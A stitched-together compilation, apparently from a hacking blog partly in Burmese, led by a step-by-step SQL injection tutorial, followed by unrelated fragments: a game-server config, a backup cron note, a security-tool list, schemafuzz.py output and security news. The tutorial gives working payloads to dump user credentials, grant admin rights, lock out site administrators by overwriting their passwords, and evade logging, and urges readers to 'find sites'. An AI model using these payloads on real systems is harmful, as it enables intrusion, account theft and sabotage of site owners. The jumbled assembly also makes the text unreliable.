this tutgoes over finding the amount of columns in the SELECT statement, creating a valid UNION statement, browsing tables/columns in databases, and viewing/editing those values. There is still alot more advanced stuff out there that isnt even mentioned here.

example URL:
[url="http://www.xxx.xx/path/whatever/order.pl?do=addprod&prodid=12"]http://www.xxx.xx/path/whatever/order.pl?d…d&prodid=12[/url]
we did our tests and found prodid to be injectable, what next?

This is what i would do. Ill try to dummy it down so you and anyone else learning can understand but just experiencing it for yourself is the best method of learning. Im expecting you to have a little knowledge of sql injection.

First find out how you can comment out of the statement, this is more important in blind sql injection since you want your statement to be inserted without any syntax errors. when the injectable value is a int you usually dont have to single quote to end, if its a string or date etc field you probably do. There are 2 parts to this part, ending the websites SELECT statement correctly before our inserted sql code and trying to comment the rest of the code after our sql code.

Using your example of order.pl?do=addprod&prodid=12
Code:
order.pl?do=addprod&prodid=12 --

if that returns the page somewhat normally then we know we can just insert our code after the 12 and just end with a standard comment, we may be commenting out a order by clause sometimes making the page look a little different but the information on the page that would be returned from the database is still being shown. I like putting a space before my comment, ive ran into a database where it didn’t like the comment butted up against my insert and wouldn’t work without it, i haven’t found one that didn’t like that space so i just make it my practice but try it both ways. If we were dealing with MS-SQL i would add –sp_password to my comment since that triggers mssql not to log. Speaking of avoiding logging, Use POST type forms instead of modifying the URL if possible and that will help keep any website stats logger from seeing the injection, rarely is POST’d data logged. But thats only if we have a choice, some fields are GET types only.

now getting back on track, if that does not return any data or causes an error then we try others
Code:
order.pl?do=addprod&prodid=12) --
order.pl?do=addprod&prodid=12)) --
order.pl?do=addprod&prodid=12' --
order.pl?do=addprod&prodid=12') --
order.pl?do=addprod&prodid=12')) --

experience will find there are alot more, commen comments are ‘–’ ‘#’ or ‘/*’ some work, some dont, just have to try.

if “order.pl?do=addprod&prodid=12′) –” was our working injection then we end the website code with ‘) and then insert our code with the standard — comment at the end. Im going to use “order.pl?do=addprod&prodid=12 –” as our working example.

Next i want to find how many columns are being returned by the websites select statement so i can use UNION correctly, when you UNION two SELECT statements together the amount of columns being returned have to be the same. I use ORDER by to find the amount of columns, you can use the UNION SELECT and keep adding null or 1,2,3 but i find ORDER by faster since some SELECT statements return lots of columns.

Code:
order.pl?do=addprod&prodid=12 ORDER BY 10--

note i used a valid prodid of 12 not a -1. if this result returns no error or in a blind injection its returns the page normally you know there are 10 or more columns being returned, add another 10 and keep adding till you see an error. The error in mysql its similer to “Unknown column ‘10′ in ‘order clause” and in ms-sql its similer to “The ORDER BY position number 10 is out of range of the number of items in the select list.”. Some columns cant be used in a order by, and will result in an error but its a different error something like “Picture column cant be used in ORDER BY”. After i get a column error i would start working backwards till i saw the page correctly again or if its a blind injection i would add one more just to be sure i was really at the last column and not a column that cant be used in a ‘order by’ before start working my way backwords till i found the correct amount.

as an example
Code:
order.pl?do=addprod&prodid=12 ORDER BY 10 -- Returns no error
order.pl?do=addprod&prodid=12 ORDER BY 20 -- Returns no error
order.pl?do=addprod&prodid=12 ORDER BY 30 -- Error about unknown column 30, i start backing up
order.pl?do=addprod&prodid=12 ORDER BY 25 -- Returns no error
order.pl?do=addprod&prodid=12 ORDER BY 26 -- Error about unknown column 26.

We know the websites Select statement is returning 25 columns, much faster then trying UNION ALL SELECT null,null,null etc etc one at a time till we get to the 25 =)

Now to use UNION to find a valid UNION statement. Most pages will only work with the first row returned from a select statement so we want to make the websites request return nothing so our union select will return the first row of data. this can be done by changing the injectable value to something invalid like -1, or using 12 and 1=2 both usually work, sometimes only one. Injectable search pages are nice since you can view many rows at once but we will take what we can get. For our example ill say our page only displays the first row of returned data. UNION ALL SELECT will return all data even duplicate, while UNION SELECT will drop duplicate rows.

Code:
order.pl?do=addprod&prodid=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 --

I dont use a FROM anything since i just want my inputted data to be displayed, and if there aren’t any expected string but got int errors it will be. If you get an error about int incompatable with string then start from the beginning and start changing 1,2,3,etc to ‘1′,2,3,etc if that make an error of int incompatable with string then you know the first field is looking for INT only. change ‘1′ back to 1 and change 2 to ‘2′, if that get you string incompatable with int then leave ‘2′ as ‘2′ and change 3 to ‘3′, work your way all the way through till no more errors and you see your inserted data on the page. Some people use null,null,null,etc as their base UNION SELECT but sometimes the page needs data being returned and not null or it wont display. But you have both methods, use both when needed. I like using 1,2,3,etc because when the page displays i know what columns i can use to return data with. so if out of the 25 columns i only see the numbers 3,7,22 actually visable on the page i know to use those to return data with, where if i used null, ill have to try each one till i see something.

Code:
-1 UNION ALL SELECT 1,2,@@version,4,5,6,user,8,9,10,11,12,13,14,15,16,17,18,19,20,21,db_name(0),23,24,25 –

@@version returns the database version. Its good idea to know what database/version is so you know what commands will work.
user or user() returns the current database user, if the username is something specific like calenderuser or photoweb then we probably can only view whats in the current database, but if we get lucky and find a page accessing the database as an admin, such as dbo then we can lurk into other databases.
In MS-SQL db_name(0) returns current database name, inc 0,1,2,3 till you see all the other databases.

All the standard stuff is done, we now have a working UNION SELECT statement and we can now start looking around. Mysql v4 does not support information_schema, you will have to guess table and column names. Leave the SELECT as 1,2,3,etc and just guess a FROM tablename.

Code:
-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM users--

If the page loads with your numbers visible still you guessed a good tablename. If you can’t find any good table names there is a chance the site is using a prefix in their table names. If the site displays error messages then just to run around the site trying to cause errors, inject a single quote somewhere and see what it errors with. Alot of times it will display the code around the error sometimes displaying a prefix that would be impossible to guess. Like if i see an error that displays a table name of wka_news, then i might try to guess table names wka_users etc… Once you guess a good tablename then start guessing columns in that table. Another good idea is use a plugin called ‘Web Developer’ for firefox and run around the site viewing form information. Majority of the time what the fields are named in the form are also what their named in the database. I also use this plugin alot to find hidden fields and to inject in drop down menu’s etc that the webdevel might have overlooked in sanatizing.

To find tables and columns in mysql v5 and ms-sql is much easier since they support information_schema, and ms-sql also support sysobjects to browse (google sysobjects for that method, im not gonna get into it).

Code:
-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.TABLES --
-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM phpbb2.INFORMATION_SCHEMA.TABLES --

the first one will return the table names in the current database, the second one will return the tables from the specified database phpbb2. You’ll need to know the database names before plugging away. Lets say the first table name is USERS in the current database. if we can only see the first row of returned data then we can use this to see the next.
Code:
-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.TABLES WHERE table_name NOT IN ('USERS') --

will return the next table name, lets say HEADLINES. now we just add HEADLINES to our not in to get the next table.
Code:
-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.TABLES WHERE table_name NOT IN ('USERS','HEADLINE') --

And keep going till you get them all. Its a pain i know… if you found a search page injectable this process is simpler because you would see all the rows, or atleast a handfull.

if we see a table name that sparks our interest like the USERS table we can view the columns in the table using.
Code:
-1 UNION ALL SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’USERS’ –

be sure to specify table_name= or you’ll get every column in the database not just in your table. Lets say ID is the first column returned, then we do.
Code:
-1 UNION ALL SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='USERS' and column_name not in ('ID') --

that returns the next column, USERNAME
Code:
-1 UNION ALL SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’USERS’ and column_name not in (‘ID’,'USERNAME’) –

etc etc till we get all the columns in the table
to be simple lets just say there is only a few columns
ID
USERNAME
PASSWORD
USERLEVEL
EMAIL

lets grab the first username/password remembering that columns 3,7,22 display returned data lets get multiple columns at once. To get multiple columns at once returned into 1 column in MySQL you can use concat(username,’:',password) and in MS-SQL you can use username %2b ‘:’ %2b password that will merge the data from username column and password column and place : inbetween. usefull if you have 1 column to return data in or to clean up the result’s html.

Code:
-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23
,24,25 FROM USERS --

Lets say this returned john / d8c250d26a7852481fcc9527e94ead69 / 10

Code:
-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23
,24,25 FROM USERS WHERE USERNAME NOT IN ('john')--

Lets say this returned carl / 8bf79d49c62dd1753620135cb9591243 / 0
userlevel 0, this user must be a regular user. But we try to crack johns password but no luck, we try carls and get password snarf but this user has no cool privlidges. I want to find other users with atleast some privs so we can do this
Code:
-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23
,24,25 FROM USERS WHERE USERNAME NOT IN ('john') and USERLEVEL > 0 --

returns the next user with a userlevel higher then 0. we go through all the users and get 5 more users but with all userlevels of 5. Eff that lets go for gold. What to do… Our options would be change johns password to a md5 hash we know the password to, change his email and use the ‘forgot password’ form to get it emailed then change the email back(carefull of this one as sometimes the password gets reset to something random before getting emailed), change carls userlevel to 10 since we already cracked his password, or make an account on this site and then change our newly created account to userlevel 10. I would opt for creating an account since its less noticeable if you plan on keeping admin rights for awhile. Use the website to make an account if possible since it will create all the propper table/column data throughout the database, just making a user into one table sometimes isnt enough, there could be another table with user information as well where if not populated with correct data wont let us login. once you make an account on the site lets find it to be sure its there.

Code:
-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23
,24,25 FROM USERS WHERE USERNAME='foo' --

returns our username foo, passwordhash, 0. awesome, lets change our userlevel.

Code:
12; INSERT INTO USERS (USERLEVEL) VALUES (‘10′) WHERE USERNAME=’foo’ –

its important to use the WHERE clause here with a value that will equal to only the row you want to change, most tables have a column like ID wich is unique and is usefull in making sure your only changing 1 row. not using any where clause would change EVERY userlevel to 10… could be funny but very noticable.

now lets check our username again.
Code:
-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23
,24,25 FROM USERS WHERE USERNAME=’foo’ –

we get foo / passwordhash / 10, oh snap lol~

now we can login as foo and see all the cool site admin tools…
but we play around and change something that is definately going to get you caught, well lets go for double gold and make it tuff for em to fix. change the passwords of all the admins/mods

Code:
12; INSERT INTO USERS (PASSWORD,EMAIL) VALUES (‘1′,’suckit@aol.com’) WHERE USERLEVEL > 0 and USERNAME NOT IN (‘foo’) –

changed all the mods and admin besides ours to a invalid password hash and a random email, so now they cant login and if they try to reset their pass it will go to some random email. Looks like some web admin wished they backed up their database…

Im done, this took awhile to write, i just did it on the spot and typed everything out by hand so hopefully all my commands are spelled correct. I would like to thanks ephedrine for making this long post possible Wink

obviously your gonna need to apply these examples to your own page and hurdle the many unique obsticles not covered here. but its a learning experience, find sites and explore~

# Bind ip of the gameserver, use * to bind on all available IPs
GameserverHostname=*
GameserverPort=7777
# This is transmitted to the clients connecting from an external network, so it has to be a public IP or resolvable hostname
ExternalHostname=WAN IP
# This is transmitted to the client from the same network, so it has to be a local IP or resolvable hostname
InternalHostname=LAN IP
# Define internal networks (10.0.0.0/8,192.168.0.0/16 is default internal networks)
InternalNetworks=
# Define optional networks and router IPs
# IP (200.100.200.100) or fully qualified domain name
# (google.com) that resolves to an IP (use ping to determine if a domain resolves).
# Format: ip,net/mask;ip,net/mask,net/mask
# (mask 192.168.0.0/16 or 192.168.0.0/255.255.0.0 would be 192.168.*.*)
# Note: keep InternalNetworks and OptionalNetworks blank for compatibility with older login server
OptionalNetworks=

# Bind ip of the loginserver, use * to bind on all available IPs
LoginserverHostname=*
LoginserverPort=2106
LoginTryBeforeBan=20

# The Loginserver host and port
LoginPort=9014
LoginHost=LAN IP

ေအာက္ က ဟာေလး ကို loginserver.properties မွာ ထည့္လိုက္ပါ ။

This is transmitted to the clients connecting from an external network, so it has to be a public IP or resolvable hostname
ExternalHostname=WAN IP

# This is transmitted to the client from the same network, so it has to be a local IP or resolvable hostname
InternalHostname=LAN IP

# Bind ip of the loginserver, use * to bind on all available IPs
LoginserverHostname=*
LoginserverPort=2106
LoginTryBeforeBan=20
GMMinLevel=200

# The port on which login will listen for GameServers
LoginPort=9014
LoginHostname=* –> i add this line here

notepad C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
localhost L2authd.lineage2.com
localhost nprotect.lineage2.com

sql injection ႏွင့္ deface ထားျခင္း ျဖစ္သည္။ဆိုဒ္မ်ား ကို .htaccess ႏွင့္ ပိတ္ပင္ျခင္းမ်ား ျပဳလုပ္သင့္ျပီး server log မ်ား ထားရွိျခင္းျဖင့္ အသင့္အတင့္ကာကြယ္ႏိုင္ပါသည္။ webmaster မ်ားအေနျဖင့္ မိမိအသံုးျပဳေသာ web apps မ်ား၏ exploit မ်ား vlun မ်ား ကို အစဥ္အျမဲ  ေလ့လာသင့္သည္။

where,
db_user is your database user who has access on your database.
db_name is the database name you are scheduling backup for.
xyz is the actual password of above database user.
+%Y%m%d%H%M is the time stamp which will help to distinguish between backup date and time.
the backup destination in above example is “/home/foo/”

add following line in cron to take backup everyday at 23:00 and will store in separate file

0 23 * * * /PathToScript.sh

Security notes Note ::
1) Dont use the command directly in cron. Put the command in a file and execute that file in cron.
2) I asked to chmod to 750 so that other will not be able to view your files.
If the file is readable by others anyone may view it and get your DB access very easily.

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

It’s been quite a while since the latest fairly major update of SamuraiWTF (around a year ago).

This is quite a major release with the integration of metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed.

You can download SamuraiWTF v0.8 here:

SamuraiWTF v0.8

http://www.beenuarora.com/code/schemafuzz.py

after that….
u can use…
like this :

parameter –findcol ကို အသံုးျပဳ ျပီး စတင္ scan လိုက္ပါ။

d0s@vps-1:# ./schemafuzz.py -u http://localhost/news.php?id=1 –findcol

ေအာက္ပါ ရလဒ္ကိုရရွိမွာ ျဖစ္ပါတယ္။

|—————————————————————|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|—————————————————————|

[+] URL: http://localhost/news.php?id=1–
[+] Evasion Used: “+” “–”
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://localhost/news…+0,1,2,3–
[+] darkc0de URL: http://localhost/news…rkc0de,2,3
[-] Done!

အထက္တြင္ျပထားေသာ ပံုစံ အတိုင္း ထပ္မံ ရွာေဖြလိုက္ပါ ။ သင့္ လိုခ်င္ေသာ ေဒတာေဗ့ table နဲ႔ အသံုးျပဳ သူ အမည္ ကို ရရွိမွာ ျဖစ္ပါတယ္။

d0s@vps-1:# ./schemafuzz.py -u http://localhost/news…rkc0de,2,3

Quote:|—————————————————————|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|—————————————————————|

[+] URL: http://localhost/news…c0de,2,3–
[+] Evasion Used: “+” “–”
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: test-db
User: test-db@localhost
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns…

ထိုထက္ပိုပီး သိခ်င္လ်င္ ./schemafuzz.py -h ကို အသံုးျပဳလိုက္ပါ။

When Netsparker identifies an SQL Injection, it can identify how to exploit it automatically and extract the version information from the application. When the version is successfully extracted Netsparker will report the issue as confirmed so that you can make sure that the issue is not a false-positive.
Same applies to other vulnerabilities such as XSS (Cross-site Scripting) where Netsparker loads the injection in an actual browser and observes the execution of JavaScript to confirm that the injection will actually get executed in the browser.

Thanks to its comprehensive and powerful JavaScript engine it’s possible to simulate a real attacker successfully. This means it can successfully analyse websites that rely on AJAX and JavaScript.

You don’t need to be a security expert, get training or read a long manual to start. Since the user interface is easy to use and can confirm and show you the impact, you can just fire it up and start using it.

Download

I’m glad people are looking at PayPal as I’m sure the volume of monetary transactions that pass through their site on a daily basis is huge. It’s still the leading payment processing solution, especially for International transactions.

Seems to be more on the business side rather than effecting users, but exposing so much customer is never a good thing.

A security researcher has uncovered multiple vulnerabilities affecting PayPal, the most critical of which could have enabled attackers to access PayPal’s business and premier reports back-end system.

The vulnerabilities were patched recently by PayPal after security researcher Nir Goldshlager of Avnet Technologies brought the vulnerabilities to the site’s attention. The most critical bug was a permission flow problem in business.paypal.com, and could have potentially exposed a massive amount of customer data.

“An attacker was able to access and watch any other user’s financial, orders and report information with unauthorized access to the report backend application,” Goldshlager explained. “When users have a premier account or business account the transaction details of their orders are saved in the reports application … an attacker can look at any finance reports of premier or business accounts in the PayPal reports application and get a full month [and] day summary of the orders reports.”
That includes information such as the PayPal buyer’s full shipping address, the PayPal transaction ID of the buyer and the date and amount of transaction.

Discovering and Exploiting Security Holes. The first edition of this volume attempted to show the reader how security vulnerabilities are discovered and exploited, and this edition holds fast to that same objective. If you’re a skilled network auditor, software developer, or sysadmin and you want to understand how  bugs are found and how exploits work at the lowest level, you’ve come to the right place. So what’s this book about? Well, the preceding quotation more or less sums it up. This book is mostly concerned with arbitrary code execution vulnerabilities, by which we mean bugs, that allow attackers to run code of their choice on the target machine. This generally happens when a program interprets a piece of data as a part of the program— part of an http “Host” header becomes a return address, part of an email address becomes a function pointer, and so on. The program ends up executing the data the attacker supplied with disastrous effects. The architecture of modern processors, operating systems, and compilers lends itself toward this kind of problem— as the good Countess wrote, “the symbols of operation are frequently also the symbols of the results of operations.” Of course, she was writing about the difficulty of discussing mathematics when the number “5” might also mean “raised to the power of 5” or “the fifth element of a series,” but the basic idea is the same. If  you confuse code and data, you’re in a world of trouble. So, this book is about code and data, and what happens when the two become confused.

Download